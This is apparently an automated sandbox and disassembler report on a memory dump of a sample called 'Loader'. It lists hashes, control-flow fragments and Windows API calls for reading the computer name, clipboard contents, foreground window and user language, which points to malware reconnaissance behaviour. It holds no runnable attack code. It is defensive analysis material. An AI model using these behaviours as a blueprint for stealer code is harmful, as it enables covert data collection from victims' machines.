                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                  Strings
                                                                                                  • FAD730AECC011CA38246926E533C64D7, xrefs: 0040D240
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FAD730AECC011CA38246926E533C64D7
                                                                                                  • API String ID: 0-2908244417
                                                                                                  • Opcode ID: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
                                                                                                  • Instruction ID: b8d103c4c60b49fbe0ba22ba74ead3f046f8f308e92d5c9b0b08579b41597fc8
                                                                                                  • Opcode Fuzzy Hash: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
                                                                                                  • Instruction Fuzzy Hash: 8C51BC72B407004BDB184F79CC52377B6A3AFE6321F1D967DD0969B7D6E63898028308
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
                                                                                                  • Instruction ID: c62614d48869f4b7cb033b57bff67ce6e552f370dc62dc9228bf6d030800f41c
                                                                                                  • Opcode Fuzzy Hash: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
                                                                                                  • Instruction Fuzzy Hash: 28412435B083514BD328CA3C9C6137BBBE2DBD6311F688A6DE5D1C7799E639C8018709
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
                                                                                                  • Instruction ID: dc484de900702ea7fd58ce72979cff842d7c41974bd76ae8d50f3999e681b5d9
                                                                                                  • Opcode Fuzzy Hash: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
                                                                                                  • Instruction Fuzzy Hash: AA01DE75A80B108BD7298F24DD6136A77E0EB07304F14806EC592A7780DA7AFD008F99

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 308 4336a0-433739 GetSystemMetrics * 2 312 433740-433af5 308->312
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem
                                                                                                  • String ID: AC$*?C$1$LGC$uDC$zBC$=C
                                                                                                  • API String ID: 4116985748-682157884
                                                                                                  • Opcode ID: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
                                                                                                  • Instruction ID: 1998a03cc5df2a2f33f1525dd043022f22112b898c887f3cf15ef20427d46a93
                                                                                                  • Opcode Fuzzy Hash: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
                                                                                                  • Instruction Fuzzy Hash: 979149B011A384CBE774EF11C5597CFBAE1AB82308F11891ED29D4B250DBBA450DDF9A

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004085D1
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004085D7
                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004085E8
                                                                                                  • GetForegroundWindow.USER32 ref: 0040869C
                                                                                                  • ExitProcess.KERNEL32 ref: 004086DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 4063528623-0
                                                                                                  • Opcode ID: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
                                                                                                  • Instruction ID: 509b8593f85bca22239e70e965a689bc814e36a94043752a13a9102ecda549f4
                                                                                                  • Opcode Fuzzy Hash: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
                                                                                                  • Instruction Fuzzy Hash: BF2168B1E002005BD7147F319D0A72A76959F86705F0A863EECD5BB3E7EE3D8811865E

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 669 42bf32-42bf3c 670 42bf5b-42bf8b 669->670 671 42bf3e-42bf45 669->671 674 42bf90-42bfaa 670->674 672 42bf50-42bf59 671->672 672->670 672->672 674->674 675 42bfac-42bfb6 674->675 676 42bfcb-42c038 GetComputerNameExA 675->676 677 42bfb8-42bfbf 675->677 678 42bfc0-42bfc9 677->678 678->676 678->678
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID: Jk
                                                                                                  • API String ID: 3545744682-2435780000
                                                                                                  • Opcode ID: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
                                                                                                  • Instruction ID: f8b6963ffdad34389f8e41c28869e3d9660b03a655e2583e95d8d3bda7f56e74
                                                                                                  • Opcode Fuzzy Hash: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
                                                                                                  • Instruction Fuzzy Hash: 9221253550C7904ADB32CB3998647EBBBE09F97304F094A6DC4DDC7286DB384405CB96

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 679 42bf30-42bf8b 681 42bf90-42bfaa 679->681 681->681 682 42bfac-42bfb6 681->682 683 42bfcb-42c038 GetComputerNameExA 682->683 684 42bfb8-42bfbf 682->684 685 42bfc0-42bfc9 684->685 685->683 685->685
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID: Jk
                                                                                                  • API String ID: 3545744682-2435780000
                                                                                                  • Opcode ID: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
                                                                                                  • Instruction ID: 1eb15b467228e91927b88c1530aa4184b94cdc4fa3224a7153598cd3ef29f343
                                                                                                  • Opcode Fuzzy Hash: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
                                                                                                  • Instruction Fuzzy Hash: 85113036608B904BDB31CB389C287EBBBD09F96310F194B2DC4DDC7295EB3848018B92
                                                                                                  APIs
                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 00436A65
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DefaultLanguageUser
                                                                                                  • String ID: u
                                                                                                  • API String ID: 95929093-4067256894
                                                                                                  • Opcode ID: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
                                                                                                  • Instruction ID: f3c22d90c568ecaed0f3cc6f16dafd322a7d18ae38fc015f3be8ab71a63a4f26
                                                                                                  • Opcode Fuzzy Hash: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
                                                                                                  • Instruction Fuzzy Hash: 29010434C082929FCF119F78C9403EE7FA16F1B310F1986A9C4D567386D7398A058B96
                                                                                                  APIs
                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040CADA
                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CC22
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2538663250-0
                                                                                                  • Opcode ID: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
                                                                                                  • Instruction ID: a48d5ef0adb5250571e8a41bd9df73004e022a6934e4612084ba1943594d6038
                                                                                                  • Opcode Fuzzy Hash: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
                                                                                                  • Instruction Fuzzy Hash: A741E4B4D10B00AFD370EF39DA4B7127EB4AB05250F404B2DF9EA866D4E631A4198BD7
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042BE25
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                  • String ID:
                                                                                                  • API String ID: 2904949787-0
                                                                                                  • Opcode ID: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
                                                                                                  • Instruction ID: 4b0124f1363a5f6538044442258c4939d1b124f166065c956affb4ec42b5f0b7
                                                                                                  • Opcode Fuzzy Hash: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
                                                                                                  • Instruction Fuzzy Hash: 7731F53522C3918FD7218B35D8107EBBBE5AF9A314F99486EC1C8D7252DB788806C791
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042BE25
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                  • String ID:
                                                                                                  • API String ID: 2904949787-0
                                                                                                  • Opcode ID: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
                                                                                                  • Instruction ID: b0442a1b6006627bfac749667bf69648ea68c72265edfd0c76de215cb43adc1f
                                                                                                  • Opcode Fuzzy Hash: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
                                                                                                  • Instruction Fuzzy Hash: 6A21F8352683918FD721DB35DC107EBBBE6EB9A314F99492ED1C9C7252DB7488028781
                                                                                                  APIs
                                                                                                  • GetForegroundWindow.USER32 ref: 0043E9A1
                                                                                                  • GetForegroundWindow.USER32 ref: 0043E9B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ForegroundWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2020703349-0
                                                                                                  • Opcode ID: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
                                                                                                  • Instruction ID: 1f1a92c4ed7c3cabed4fabd3d678f137bf463a9ca5e289bc5fa2f09bb69a997d
                                                                                                  • Opcode Fuzzy Hash: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
                                                                                                  • Instruction Fuzzy Hash: B7D012B9C000068BDF44DFA0FC8D44E7769BE46619F045035E40343122E93495068B4D
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3545744682-0
                                                                                                  • Opcode ID: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
                                                                                                  • Instruction ID: 2ec592fbdc78758a6a3c226a3e8484dbb67dbcc7126bdc08d1755178837746e5
                                                                                                  • Opcode Fuzzy Hash: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
                                                                                                  • Instruction Fuzzy Hash: 472129352283918FD720DB35DC107EBBBE5EB9A324F994C2EC1C8C7252DB7488028781
                                                                                                  APIs
                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,00439407,02BD73B0,00000000,02BD73B0,00439407,00000000,00004000,?,?,?,?,00000001,02BD73B0,000001EB), ref: 0043D9C2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
                                                                                                  • Instruction ID: b8b631638b18798679597f3341c455e23d05a83346a63bcdeeebd9bf56da5e38
                                                                                                  • Opcode Fuzzy Hash: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
                                                                                                  • Instruction Fuzzy Hash: EFF0277A8582A0FBC6116F25BC02A9B3664EF8F315F01147BF401A6121DB3ADC06D6DF
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BlanketProxy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3890896728-0
                                                                                                  • Opcode ID: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
                                                                                                  • Instruction ID: 24518978adee5ca75fa83efdf11994bb0dab04cffabc163f3a89706635ba24a8
                                                                                                  • Opcode Fuzzy Hash: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
                                                                                                  • Instruction Fuzzy Hash: 92F0A4B45093518FE321DF25D56974FBBE4BB88348F11891CE8945B291C7B99A488FC2
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BlanketProxy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3890896728-0
                                                                                                  • Opcode ID: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
                                                                                                  • Instruction ID: a6a0066e54c7d049ab9ba52ee2f517c0d060c6457a62882aa2ba7396dcee3bc7
                                                                                                  • Opcode Fuzzy Hash: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
                                                                                                  • Instruction Fuzzy Hash: 2CF07AB45087018FD354DF25D5A875BBBE0FB85304F00881DE5D68B290DBB59A48CF86
                                                                                                  APIs
                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CC79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeSecurity
                                                                                                  • String ID:
                                                                                                  • API String ID: 640775948-0
                                                                                                  • Opcode ID: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
                                                                                                  • Instruction ID: 2b78fd6e66c85e2770e1fedaeca4d467f1847f566c0c49e5f6124588b814a6a2
                                                                                                  • Opcode Fuzzy Hash: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
                                                                                                  • Instruction Fuzzy Hash: C6D092353D83417BF9645B08AD53F1072509746F16F310624B323FE2E5C9906501860C
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,00000000,004146B4,00000000), ref: 0043BD60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
                                                                                                  • Instruction ID: f90848bae3256b06cf5094926935a10db3a74c04a44cfe7e493f6f0e12b6a334
                                                                                                  • Opcode Fuzzy Hash: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
                                                                                                  • Instruction Fuzzy Hash: 85D0C931465622EBC6146F18BC15BC73A54DF4A361F0708A2F4006A475C675DC91DAE8
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,00408638,?,00408638), ref: 0043BD30
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
                                                                                                  • Instruction ID: 2c7a29268eac836babc22c216ba9330a039660881ad4ae188c8b4a1fbc13fc40
                                                                                                  • Opcode Fuzzy Hash: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
                                                                                                  • Instruction Fuzzy Hash: 40C09B31455321EBC6106B15FC05FC77F54DF49751F1140A6B00477072C771AC41C6D8
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                  • String ID: Q$]$e$j$q$x
                                                                                                  • API String ID: 2832541153-692368135
                                                                                                  • Opcode ID: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
                                                                                                  • Instruction ID: 6f1dbd0e63c0454490a30a8cba9f540b8e981e08c188719af7d206ff943662a7
                                                                                                  • Opcode Fuzzy Hash: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
                                                                                                  • Instruction Fuzzy Hash: 9B41927150C7418ED310AF78988935FBFE0AB9A315F044A3EE4D5873D2D6788649C75B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: o;i$#C(]$1G#A$3SQm$KJIH$rqB$xlc=
                                                                                                  • API String ID: 0-4225912290
                                                                                                  • Opcode ID: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
                                                                                                  • Instruction ID: 99384cb80079416eac910717a9e1d0dd8795ebf962f0defd3915704c1b902f09
                                                                                                  • Opcode Fuzzy Hash: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
                                                                                                  • Instruction Fuzzy Hash: 06914876A0C3248BC320DF64E88165FB7E1EBC9704F59493EE98997341DB74AD058BCA
                                                                                                  APIs
                                                                                                    • Part of subcall function 0043DA10: LdrInitializeThunk.NTDLL(00440D9D,?,00000018,?,?,00000018,?,?,?), ref: 0043DA3E
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419706
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041976B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                  • String ID: 056w$HS$X{$wB
                                                                                                  • API String ID: 764372645-2637307891
                                                                                                  • Opcode ID: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
                                                                                                  • Instruction ID: 5228fd0e467c720768e27c90b66e3c9c54d982958b1791ede40bd78fdaf92bff
                                                                                                  • Opcode Fuzzy Hash: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
                                                                                                  • Instruction Fuzzy Hash: B0821B746483406BE724CF24D8A076BBBE1EBD6714F28892DE0D5473A1D379DC82CB5A
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418272
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: <9$L$o
                                                                                                  • API String ID: 237503144-3122339205
                                                                                                  • Opcode ID: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
                                                                                                  • Instruction ID: 38d06cfc946e2d634f33bc898b8b3081b8a665a97a1976fa3bc9cb3ab81d6238
                                                                                                  • Opcode Fuzzy Hash: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
                                                                                                  • Instruction Fuzzy Hash: F6E14B756083528BD320CF29D8D07ABB7E1EF99324F188A3DE4C487391EB789945CB56
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,59195F3A,00000000,00000000,?), ref: 004181F4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: M+O$!C-M$7imJ$}Y*[$qWs
                                                                                                  • API String ID: 237503144-2509796657
                                                                                                  • Opcode ID: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
                                                                                                  • Instruction ID: 249fc3654da106cc027156d5fad6694f65c71858bdaf82a4f9d6bcb215be2f5f
                                                                                                  • Opcode Fuzzy Hash: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
                                                                                                  • Instruction Fuzzy Hash: 3F9116716183128BC324CF14C4916BBB7F1EFC9764F199A1EE5CA5B361E7389881C74A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
                                                                                                  • API String ID: 0-3444116175
                                                                                                  • Opcode ID: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
                                                                                                  • Instruction ID: 7e836b9766b242f3fc3dd51180be0f2cab443d7991a9e66097dbc5a85011b6e9
                                                                                                  • Opcode Fuzzy Hash: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
                                                                                                  • Instruction Fuzzy Hash: 0BD14775609321CBC3149F18D85166FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
                                                                                                  • API String ID: 0-3444116175
                                                                                                  • Opcode ID: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
                                                                                                  • Instruction ID: f976bc588ec640565c7012468651d5ffc8b69fa3d08ac8f64f271550ea2c12cc
                                                                                                  • Opcode Fuzzy Hash: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
                                                                                                  • Instruction Fuzzy Hash: ADD13675609321CBC3149F18D85266FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: KJIH$KJIH$xlc=$xlc=$xlc=$tz$x~
                                                                                                  • API String ID: 0-1340891752
                                                                                                  • Opcode ID: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
                                                                                                  • Instruction ID: 4b9b57266fa6f88c6c86b47bd8eb3fb309f79ef555365d41f88ab1d7a07e1ec3
                                                                                                  • Opcode Fuzzy Hash: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
